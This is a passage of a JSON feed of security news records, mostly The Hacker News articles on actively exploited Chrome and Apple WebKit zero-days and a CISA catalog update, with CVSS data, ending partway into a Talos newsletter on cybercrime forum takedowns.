Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T03:25:00", "type": "thn", "title": "Google Releases Urgent Chrome Update to Patch Actively Exploited Zero-Day Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364"], "modified": "2022-04-18T03:04:38", "id": "THN:E48AEFF468AB8445D91A32B6F5D7A770", "href": "https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-28T12:06:14", "description": 
"[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhv36XpOZ1dAQAOtoI2FJrLTIwbrZmkU8pIotJv8smSt1yHSR5Sbs9DtPNusAAMvajmGc-st695EsqO3w1aNTpm9vxASuSHCLI61DemGb3LaAMW7MDDLo4j30s4iE1DZr2UeTpkEHlUc-WwTo0zqCxLNMlSHPLCRNEDT4wpaWQjgJMl3KhUpK7MKa2Z/s728-e100/chrome-zero-day-vulnerability.jpg>)\n\nGoogle on Thursday rolled out emergency fixes to contain an actively exploited zero-day flaw in its Chrome web browser.\n\nThe [vulnerability](<https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html>), tracked as **CVE-2022-3723**, has been described as a type confusion flaw in the V8 JavaScript engine.\n\nSecurity researchers Jan Vojt\u011b\u0161ek, Mil\u00e1nek, and Przemek Gmerek of Avast have been credited with reporting the flaw on October 25, 2022.\n\n\"Google is aware of reports that an exploit for CVE-2022-3723 exists in the wild,\" the internet giant acknowledged in an advisory without getting into more specifics about the nature of the attacks.\n\nCVE-2022-3723 is the third actively exploited type confusion bug in V8 this year after [CVE-2022-1096](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) and [CVE-2022-1364](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>).\n\nThe latest fix also marks the resolution of the seventh zero-day in Google Chrome since the start of 2022 -\n\n * [**CVE-2022-0609**](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [**CVE-2022-1096**](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-1364**](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-2294**](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>) \\- Heap buffer overflow in WebRTC\n * 
[**CVE-2022-2856**](<https://thehackernews.com/2022/08/new-google-chrome-zero-day.html>) \\- Insufficient validation of untrusted input in Intents\n * [**CVE-2022-3075**](<https://thehackernews.com/2022/09/google-release-urgent-chrome-update-to.html>) \\- Insufficient data validation in Mojo\n\nUsers are recommended to upgrade to version 107.0.5304.87 for macOS and Linux and 107.0.5304.87/.88 for Windows to mitigate potential threats.\n\nUsers of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2022-10-28T10:40:00", "type": "thn", "title": "Google Issues Urgent Chrome Update to Patch Actively Exploited Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2856", "CVE-2022-3075", "CVE-2022-3723"], "modified": "2022-10-28T10:58:12", "id": "THN:222F7713CA968509F8C385BA29B0B6A5", "href": "https://thehackernews.com/2022/10/google-issues-urgent-chrome-update-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-26T04:08:15", "description": "[ ](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEikPLibtmTn8N2H14UEsCbQi0mXDkp7d4sxfUThlf9SHApnBVQaXlzTa5_Y_GROcH_HN9A8cDTE0iaRtCHiFqthOucxRIZyrjEzXxqkiX0DQPciOOULFnJ0I4aob50-m5id5elUHNKFtdF-5Ep-jdQVcYtFgUVENLsQkZIYWjXsuoDDYF_UBh0lc0o2/s728-e100/chrome-update.png>)\n\nGoogle on Thursday released software updates to address yet another zero-day flaw in its Chrome web browser.\n\nTracked as **CVE-2022-4135**, the high-severity vulnerability has been described as a heap buffer overflow in the GPU component. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the flaw on November 22, 2022.\n\nHeap-based buffer overflow bugs can be [weaponized](<https://cwe.mitre.org/data/definitions/122.html>) by threat actors to crash a program or execute arbitrary code, leading to unintended behavior.\n\n\"Google is aware that an exploit for CVE-2022-4135 exists in the wild,\" the tech giant [acknowledged](<https://chromereleases.googleblog.com/2022/11/stable-channel-update-for-desktop_24.html>) in an advisory.\n\nBut like other actively exploited issues, technical specifics have been withheld until a majority of the users are updated with a fix and to prevent further abuse.\n\nWith the latest update, Google has resolved eight zero-day vulnerabilities in Chrome since the start of the year -\n\n * [**CVE-2022-0609**](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [**CVE-2022-1096**](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type 
confusion in V8\n * [**CVE-2022-1364**](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-2294**](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>) \\- Heap buffer overflow in WebRTC\n * [**CVE-2022-2856**](<https://thehackernews.com/2022/08/new-google-chrome-zero-day.html>) \\- Insufficient validation of untrusted input in Intents\n * [**CVE-2022-3075**](<https://thehackernews.com/2022/09/google-release-urgent-chrome-update-to.html>) \\- Insufficient data validation in Mojo\n * [**CVE-2022-3723**](<https://thehackernews.com/2022/10/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n\nUsers are recommended to upgrade to version 107.0.5304.121 for macOS and Linux and 107.0.5304.121/.122 for Windows to mitigate potential threats.\n\nUsers of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2022-11-25T13:12:00", "type": "thn", "title": "Update Chrome Browser Now to Patch New Actively Exploited Zero-Day Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2856", "CVE-2022-3075", "CVE-2022-3723", "CVE-2022-4135"], "modified": "2022-11-26T04:07:40", "id": "THN:FFFF05ECDE44C9ED26B53D328B60689B", "href": "https://thehackernews.com/2022/11/update-chrome-browser-now-to-patch-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-05T16:25:13", "description": 
"[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjPIpWOjahlvRij54ICh2NyDdEkKI9koTk4lx8UXqPG1hBOVokLO1jZE7QvnnAHX4fw21sdwK34cVKndChvGxTI0QScuSjwYGvpLSpuK9FSFbuXtXzoaxwm6I78OZwM-uyBKf7_r18ShybiBxFrmBcIKJ7pAD2BPSMaEVwJzpBkK1kNSbrrtJ6AmkPk/s728-e100/chrome-update.jpg>)\n\nGoogle on Monday shipped security updates to address a high-severity zero-day vulnerability in its Chrome web browser that it said is being exploited in the wild.\n\nThe shortcoming, tracked as [**CVE-2022-2294**](<https://chromereleases.googleblog.com/2022/07/stable-channel-update-for-desktop.html>), relates to a heap overflow flaw in the [WebRTC](<https://en.wikipedia.org/wiki/WebRTC>) component that provides real-time audio and video communication capabilities in browsers without the need to install plugins or download native apps.\n\nHeap buffer overflows, also referred to as heap overrun or heap smashing, occur when data is overwritten in the [heap area of the memory](<https://en.wikipedia.org/wiki/Memory_management#Manual_memory_management>), leading to arbitrary code execution or a denial-of-service (DoS) condition.\n\n\"Heap-based overflows can be used to overwrite function pointers that may be living in memory, pointing it to the attacker's code,\" MITRE [explains](<https://cwe.mitre.org/data/definitions/122.html>). \"When the consequence is arbitrary code execution, this can often be used to subvert any other security service.\"\n\nCredited with reporting the flaw on July 1, 2022, is Jan Vojtesek from the Avast Threat Intelligence team. 
It's worth pointing out that the bug also [impacts](<https://chromereleases.googleblog.com/2022/07/chrome-for-android-update.html>) the Android version of Chrome.\n\nAs is usually the case with zero-day exploitation, details pertaining to the flaw as well as other specifics related to the campaign have been withheld to prevent further abuse in the wild and until a significant chunk of users are updated with a fix.\n\nCVE-2022-2294 also marks the resolution of the fourth zero-day vulnerability in Chrome since the start of the year -\n\n * [**CVE-2022-0609**](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [**CVE-2022-1096**](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-1364**](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>) \\- Type confusion in V8\n\nUsers are recommended to update to version 103.0.5060.114 for Windows, macOS, and Linux and 103.0.5060.71 for Android to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\nThe disclosure shortly follows a report from Google Project Zero, which [noted](<https://googleprojectzero.blogspot.com/2022/06/2022-0-day-in-wild-exploitationso-far.html>) that a total of 18 security vulnerabilities have been exploited as unpatched zero-days in the wild so far this year.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-05T02:55:00", "type": "thn", "title": "Update Google Chrome Browser to Patch New Zero-Day Exploit Detected in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294"], "modified": "2022-07-05T13:54:52", "id": "THN:2E90A09BA23747C57B4B5C9ED7D13ED9", "href": "https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-20T04:20:39", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhOfL8YkCmEWRL1H5ftHD1fx4A4jxsGJDAVf5omgkgPfSQyjRb8UkrvUfIv8qDwSUzf47MO8jkHCs0-QIFfKhOZTFYaIst08bRXhbdewNA4eUVRra24Zwc5gTnGf3z0BiN8vKyVM4SDkzgnoP8SwSsICSU9znwt8tuGFGTCOSqj2bq2dE3YQAH4Aajb/s728-e365/apple-patch.jpg>)\n\nApple on Thursday 
[rolled out security updates](<https://support.apple.com/en-us/HT201222>) to iOS, iPadOS, macOS, tvOS, watchOS, and the Safari web browser to address dozens of flaws, including three new zero-days that it said are being actively exploited in the wild.\n\nThe three security shortcomings are listed below -\n\n * **CVE-2023-32409** \\- A WebKit flaw that could be exploited by a malicious actor to break out of the Web Content sandbox. It was addressed with improved bounds checks.\n * **CVE-2023-28204** \\- An out-of-bounds read issue in WebKit that could be abused to disclose sensitive information when processing web content. It was addressed with improved input validation.\n * **CVE-2023-32373** \\- A use-after free bug in WebKit that could lead to arbitrary code execution when processing maliciously crafted web content. It was addressed with improved memory management.\n\nThe iPhone maker credited Cl\u00e9ment Lecigne of Google's Threat Analysis Group (TAG) and Donncha \u00d3 Cearbhaill of Amnesty International's Security Lab for reporting CVE-2023-32409. 
An anonymous researcher has been acknowledged for reporting the other two issues.\n\nIt's worth noting that both CVE-2023-28204 and CVE-2023-32373 were patched as part of [Rapid Security Response updates](<https://support.apple.com/en-us/HT201224>) \u2013 iOS 16.4.1 (a) and iPadOS 16.4.1 (a) \u2013 the company released at the start of the month.\n\nThere are currently no additional technical specifics about the flaws, the nature of the attacks, or the identity of the threat actors that may be exploiting them.\n\nThat said, such weaknesses have been historically leveraged as part of [highly-targeted](<https://thehackernews.com/2023/04/nso-group-used-3-zero-click-iphone.html>) [intrusions](<https://thehackernews.com/2023/05/bouldspy-android-spyware-iranian.html>) to deploy mercenary spyware on the devices of dissidents, journalists, and human rights activists, among others.\n\nThe latest updates are available for the following devices and operating systems -\n\n * **iOS 16.5 and iPadOS 16.5** \\- iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later\n * **iOS 15.7.6 and iPadOS 15.7.6** \\- iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)\n * **macOS Ventura 13.4** \\- macOS Ventura\n * **tvOS 16.5** \\- Apple TV 4K (all models) and Apple TV HD\n * **watchOS 9.5** \\- Apple Watch Series 4 and later\n * **Safari 16.5** \\- macOS Big Sur and macOS Monterey\n\nApple has so far remediated a total of six actively exploited zero-days since the start of 2023. 
Earlier this February, the company plugged a WebKit flaw ([CVE-2023-23529](<https://thehackernews.com/2023/02/patch-now-apples-ios-ipados-macos-and.html>)) that could lead to remote code execution.\n\nThen last month, it shipped fixes for a pair of vulnerabilities ([CVE-2023-28205 and CVE-2023-28206](<https://thehackernews.com/2023/04/apple-releases-updates-to-address-zero.html>)) that allowed for code execution with elevated privileges. Lecigne and \u00d3 Cearbhaill were credited with reporting the security defects.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-05-19T03:43:00", "type": "thn", "title": "WebKit Under Attack: Apple Issues Emergency Patches for 3 New Zero-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2023-23529", "CVE-2023-28204", "CVE-2023-28205", "CVE-2023-28206", "CVE-2023-32373", "CVE-2023-32409"], "modified": "2023-05-20T04:03:09", "id": "THN:8381F519DFF54C15EB87683549455A83", "href": "https://thehackernews.com/2023/05/webkit-under-attack-apple-issues.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-17T15:25:34", "description": 
"[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj3_bb3VbAiNI0HLVud2PvXV4VExBpknt5lLSc3IAtymjftt7sn5yG-gY7yWqZ7D13YpvQEhW_EH4K62wzm6dC_qDTQQokydIY0LHI2Ivvv6v5ShPJk8fOOoh0yQrASsDwCREknRK5SCrggAETbG4yY7w0t3uG53Dnpf3ckvBXKygsIpNHrnmHDrimR/s728-e100/chrome.png>)\n\nGoogle on Tuesday rolled out patches for Chrome browser for desktops to contain an actively exploited high-severity zero-day flaw in the wild.\n\nTracked as **CVE-2022-2856**, the issue has been described as a case of insufficient validation of untrusted input in [Intents](<https://www.chromium.org/developers/web-intents-in-chrome/>). Security researchers Ashley Shen and Christian Resell of Google Threat Analysis Group have been credited with reporting the flaw on July 19, 2022.\n\nAs is typically the case, the tech giant has refrained from sharing additional specifics about the shortcoming until a majority of the users are updated. \"Google is aware that an exploit for CVE-2022-2856 exists in the wild,\" it [acknowledged](<https://chromereleases.googleblog.com/2022/08/stable-channel-update-for-desktop_16.html>) in a terse statement.\n\nThe latest update further addresses 10 other security flaws, most of which relate to use-after-free bugs in various components such as FedCM, SwiftShader, ANGLE, and Blink, among others. 
Also fixed is a heap buffer overflow vulnerability in Downloads.\n\nThe development marks the fifth zero-day vulnerability in Chrome that Google has resolved since the start of the year -\n\n * [**CVE-2022-0609**](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [**CVE-2022-1096**](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-1364**](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-2294**](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>) \\- Heap buffer overflow in WebRTC\n\nUsers are recommended to update to version 104.0.5112.101 for macOS and Linux and 104.0.5112.102/101 for Windows to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-17T12:02:00", "type": "thn", "title": "New Google Chrome Zero-Day Vulnerability Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2856"], "modified": "2022-08-17T13:41:27", "id": "THN:EDC4E93542AFAF751E67BF527C826DA4", "href": "https://thehackernews.com/2022/08/new-google-chrome-zero-day.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T06:17:28", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEicw1SKpG1H9PmPf9gDuYYYi3gdQD3zFQo5j0z14zimEBBMe-b7Ey9uDqInHE1TovFVk5j-kpvYYMZQ6bG0fiZK0V69Z0gHGCe2PiqDwUu5rbJvdsyMCcquDVmtT68gnm_Wu_Fjw62Gb8jQgl9lOi2VAoWOJ8m63FHfZ-6aEIQ2Vx4V6jimGDtrvw_F/s728-e365/cisa.jpg>)\n\nThe U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) on Friday added [five security flaws](<https://www.cisa.gov/news-events/alerts/2023/04/07/cisa-adds-five-known-exploited-vulnerabilities-catalog>) to its Known Exploited Vulnerabilities ([KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) catalog, citing evidence of active exploitation in the wild.\n\nThis includes three high-severity flaws in the Veritas Backup Exec Agent software (CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878) that could lead to the execution of privileged commands on the underlying system. The flaws were [fixed](<https://www.veritas.com/support/en_US/security/VTS21-001>) in a patch released by Veritas in March 2021.\n\n * [**CVE-2021-27876**](<https://nvd.nist.gov/vuln/detail/CVE-2021-27876>) (CVSS score: 8.1) - Veritas Backup Exec Agent File Access Vulnerability\n * [**CVE-2021-27877**](<https://nvd.nist.gov/vuln/detail/CVE-2021-27877>) (CVSS score: 8.2) - Veritas Backup Exec Agent Improper Authentication Vulnerability\n * [**CVE-2021-27878**](<https://nvd.nist.gov/vuln/detail/CVE-2021-27878>) (CVSS score: 8.8) - Veritas Backup Exec Agent Command Execution Vulnerability\n\nGoogle-owned Mandiant, in a [report](<https://www.mandiant.com/resources/blog/alphv-ransomware-backup>) published last week, revealed that an affiliate associated with the [BlackCat](<https://thehackernews.com/2022/09/blackcat-ransomware-attackers-spotted.html>) (aka ALPHV and Noberus) ransomware operation is targeting publicly exposed Veritas Backup Exec installations to gain initial access by leveraging the aforementioned three bugs.\n\nThe threat intelligence firm, which is tracking the affiliate actor under its uncategorized moniker UNC4466, said it first observed exploitation of the flaws in the wild on October 22, 2022.\n\nIn one incident detailed by Mandiant, UNC4466 gained access to an internet-exposed Windows server, followed by carrying out a series of actions that allowed the attacker 
to deploy the Rust-based ransomware payload, but not before conducting reconnaissance, escalating privileges, and disabling Microsoft Defender's real-time monitoring capability.\n\nAlso added by CISA to the KEV catalog is [CVE-2019-1388](<https://nvd.nist.gov/vuln/detail/CVE-2019-1388>) (CVSS score: 7.8), a privilege escalation flaw impacting the Microsoft Windows Certificate Dialog that could be exploited to run processes with elevated permissions on an already compromised host.\n\nThe fifth vulnerability included in the list is an information disclosure flaw in the Arm Mali GPU Kernel Driver ([CVE-2023-26083](<https://nvd.nist.gov/vuln/detail/cve-2023-26083>)) that was [revealed](<https://thehackernews.com/2023/03/spyware-vendors-caught-exploiting-zero.html>) by Google's Threat Analysis Group (TAG) last month as abused by an unnamed spyware vendor as part of an exploit chain to break into Samsung's Android smartphones.\n\nFederal Civilian Executive Branch (FCEB) agencies have until April 28, 2023, to apply the patches to secure their networks against potential threats.\n\nThe advisory also comes as Apple released updates for iOS, iPadOS, macOS, and the Safari web browser to address a [pair of zero-day flaws](<https://thehackernews.com/2023/04/apple-releases-updates-to-address-zero.html>) (CVE-2023-28205 and CVE-2023-28206) that it said have been exploited in real-world attacks.\n\n### Update:\n\nCISA, on April 10, 2023, [added](<https://www.cisa.gov/news-events/alerts/2023/04/10/cisa-adds-two-known-exploited-vulnerabilities-catalog>) the two Apple zero-day vulnerabilities to the KEV catalog, urging FCEB agencies to secure iOS, iPadOS, and macOS devices by May 1, 2023.\n",
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-04-10T06:25:00", "type": "thn", "title": "CISA Warns of 5 Actively Exploited Security Flaws: Urgent Action Required", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1388", "CVE-2021-27876", "CVE-2021-27877", "CVE-2021-27878", "CVE-2023-26083", "CVE-2023-28205", "CVE-2023-28206"], "modified": "2023-04-11T04:30:44", "id": "THN:ED17BB6E1286DD4E36EFE5877F25B545", "href": "https://thehackernews.com/2023/04/cisa-warns-of-5-actively-exploited.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2023-05-09T19:58:11", "description": "Welcome to this week's edition of the Threat Source newsletter.\n\nLaw enforcement organizations across the globe notched a series of wins over the past few weeks against online forums for cybercriminals.\n\nOn March 23, the FBI announced it [disrupted the online cybercriminal marketplace 
BreachForums](<https://www.justice.gov/opa/pr/justice-department-announces-arrest-founder-one-world-s-largest-hacker-forums-and-disruption>), known for being a place where users could buy and sell stolen user information. They also arrested a 20-year-old suspected of being the site's founder and main administrator.\n\nThen last week we had ["Operation Cookie Monster"](<https://arstechnica.com/tech-policy/2023/04/operation-cookie-monster-feds-seize-notorious-hacker-marketplace/>) in which several international agencies worked together [to take down Genesis Market](<https://www.reuters.com/world/uk/operation-cookie-monster-international-police-action-seizes-dark-web-market-2023-04-05/>), a similar dark web forum, arresting dozens of suspected users and administrators.\n\nThese arrests and network operations are important in that they disrupted sites that were known for highly sensitive information and served as a place for some of the most prolific cyber criminals to make money. The U.S. Department of Justice estimated that Genesis Market was responsible for the sale of data on more than 1.5 million compromised computers around the world containing over 80 million account access credentials. And the U.K.'s National Crime Agency (NCA) said credentials were available for as little as 70 cents to hundreds of dollars depending on the stolen data available.\n\nBut the user base for these sites was also huge (after all, someone had to 